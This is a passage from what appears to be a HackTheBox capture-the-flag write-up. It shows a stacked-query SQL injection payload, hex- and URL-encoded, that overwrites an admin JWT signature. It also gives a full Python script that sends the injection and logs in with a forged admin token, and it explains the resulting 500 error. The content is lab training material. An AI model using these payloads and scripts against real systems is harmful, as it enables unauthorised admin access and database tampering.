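print(signature)
```

The signature is an HMAC-SHA256 over the first two segments, so it changes whenever the payload or the secret changes.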

c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs

It's time to craft our SQL Injection Payload!

Payload

';UPDATE signatures SET signature = c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs WHERE user_id = 1#

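Written like that, the unquoted signature isn't valid SQL, so we encode it as a hexadecimal literal (0x...), which MySQL treats as a string without needing any additional quotes. The SQL injection string also has to be URL-encoded since it's being delivered through a URL path parameter.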

';UPDATE signatures SET signature = 0x6338567864307a76767036366364554765785a463634615875524e5f7837577034504c5f546d302d696873 WHERE user_id = 1#

Now we will make it URL encoded.

%27%3BUPDATE%20signatures%20SET%20signature%20%3D%200x6338567864307a76767036366364554765785a463634615875524e5f7837577034504c5f546d302d696873%20WHERE%20user_id%20%3D%201%23
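The two encoding steps above can be reproduced with a short sketch, which is handy when your signature differs from mine. It uses only the standard library; the variable names are arbitrary.

```python
from urllib.parse import quote

signature = "c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs"

# Step 1: hex-encode the signature so no extra quotes are needed inside the SQL.
hex_literal = "0x" + signature.encode().hex()

# Step 2: build the stacked-query payload and URL-encode every reserved character.
payload = f"';UPDATE signatures SET signature = {hex_literal} WHERE user_id = 1#"
encoded = quote(payload, safe="")

print(hex_literal)
print(encoded)
```

The encoded string is what gets appended to /controller/device/ in the request.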

All we need to do now is send it in a GET request and then log in with our new admin JWT token.

Here's a Python script that automates both steps:

import requests
import re

# Target host and port
base_url = "http://<TARGET_HOST>:<TARGET_PORT>"

# Moderator JWT token (replace this with your actual moderator token)
moderator_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6Ijk4MjRmOWMxNTQzNjI4YTg1YmI1MWQyZGQ2ZmNmOGEzIiwiYWNjb3VudF90eXBlIjoibW9kZXJhdG9yIn0.BKksNigs_z9erSl5ZN1PsQb5V7Or1UwsxkNQK76tt1c"

# Crafted admin JWT token (replace this with your actual admin token)
admin_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImxlYW4iLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0.c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs"

# Step 1: SQL Injection to insert the malicious JWT signature (modify based on your signature)
injection_payload = "/controller/device/%27%3BUPDATE%20signatures%20SET%20signature%20%3D%200x6338567864307a76767036366364554765785a463634615875524e5f7837577034504c5f546d302d696873%20WHERE%20user_id%20%3D%201%23"
mod_headers = {
    "Cookie": f"jwt={moderator_jwt}"
}

print("[*] Performing SQL injection to update admin JWT signature...")
inj_response = requests.get(base_url + injection_payload, headers=mod_headers)
print(f"[+] Injection request status: {inj_response.status_code}")

# Step 2: Access /controller/admin using crafted admin JWT
admin_headers = {
    "Cookie": f"jwt={admin_jwt}"
}

print("[*] Accessing /controller/admin...")
admin_response = requests.get(f"{base_url}/controller/admin", headers=admin_headers)

# Step 3: Search for flag in response
flag_match = re.search(r"HTB\{.*?\}", admin_response.text)

if flag_match:
    print(f"[+] Flag found: {flag_match.group(0)}")
else:
    print("[-] Flag not found or access was denied.")

Run and we should get the flag!

Bingo!

Now some of you may be wondering why the status code is 500. Shouldn't it be 200? Actually, a 500 here is a good sign that our exploit is working! Here's why:

  • It means that our injection reached the backend.

    • A syntax error, query failure, or logic bug triggered a server-side exception.

    • It proves that:

      • Our input was processed.

      • The server tried to execute our payload.

      • And something broke, which usually means we're close or successful.

  • Stacked query injections (like in our case):

    • We’re sending something like '; UPDATE ...; -- in a vulnerable parameter.

    • If the injection is syntactically correct but the backend isn’t expecting multiple queries (or gets confused during fetchall() after a non-SELECT), it often throws a 500.

    • In our specific situation, the backend still calls cursor.fetchall() after the non-SELECT (UPDATE) statement and then indexes into the results, which raises a list index out of range error. Boom, 500.

To see why, look back at the fetch_device function and analyze this line:

device = self.query(query, multi=True)[0][0]

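Our payload closes the string right away, so the original SELECT most likely matches no device, and the UPDATE returns no rows at all. Going by the query method shown earlier (and assuming one is left at False), that gives:

  • results = [[], []] (one empty list per statement)

  • results[0][0] → IndexError

  • = 500 Internal Server Error

The exception is raised only after query() has executed and committed every statement, so the UPDATE has already taken effect by the time the server returns the error.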

And that's exactly what you get if you send the payload using curl:

{"error":{"message":["list index out of range"],"type":"IndexError"}}
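The same behaviour can be reproduced locally. The sketch below is a simulation under stated assumptions, not the challenge code: it uses an in-memory SQLite database instead of the real backend, a made-up schema, a reduced stand-in for the query method, and "--" as the comment marker because SQLite does not accept "#".

```python
import sqlite3


def run_multi(conn, query):
    """Reduced stand-in for the multi-statement branch: split on ';', run each piece."""
    results = []
    cursor = conn.cursor()
    for statement in query.split(";"):
        cursor.execute(statement)
        # description is None after a non-SELECT, so guard before reading column names
        columns = [col[0] for col in cursor.description or []]
        results.append([dict(zip(columns, row)) for row in cursor.fetchall()])
        conn.commit()
    return results


# Hypothetical schema, just enough to run the two statements
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE devices (device_id TEXT, name TEXT)")
conn.execute("CREATE TABLE signatures (user_id INTEGER, signature TEXT)")
conn.execute("INSERT INTO signatures VALUES (1, 'original')")
conn.commit()

device_id = "';UPDATE signatures SET signature = 'forged' WHERE user_id = 1 --"
query = f"SELECT * FROM devices WHERE device_id = '{device_id}'"

results = run_multi(conn, query)
try:
    device = results[0][0]  # same indexing as in fetch_device
    error = None
except IndexError as exc:
    error = str(exc)

stored = conn.execute("SELECT signature FROM signatures WHERE user_id = 1").fetchone()[0]
print(results, error, stored)
```

Both statements return no rows, the indexing fails, and the signature row has already been overwritten when the error surfaces.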

In offensive security, a 500 is a signal that your payload is doing something. It might not be perfect yet, but it tells you the input reached code that acted on it.

Conclusion

Honestly, this challenge was quite tough—it demands chaining together several complex vulnerabilities to pull off the full exploit. From CRLF injection and cache poisoning to timing attacks and SQL injection, each step requires a deep understanding of how different components interact. It's not just about finding one bug but carefully combining them in the right order and with precise timing. Overall, it's a great exercise in real-world exploitation and a solid test of both patience and technical skill! HackTheBox is really tough, that's all I can say. Xd!
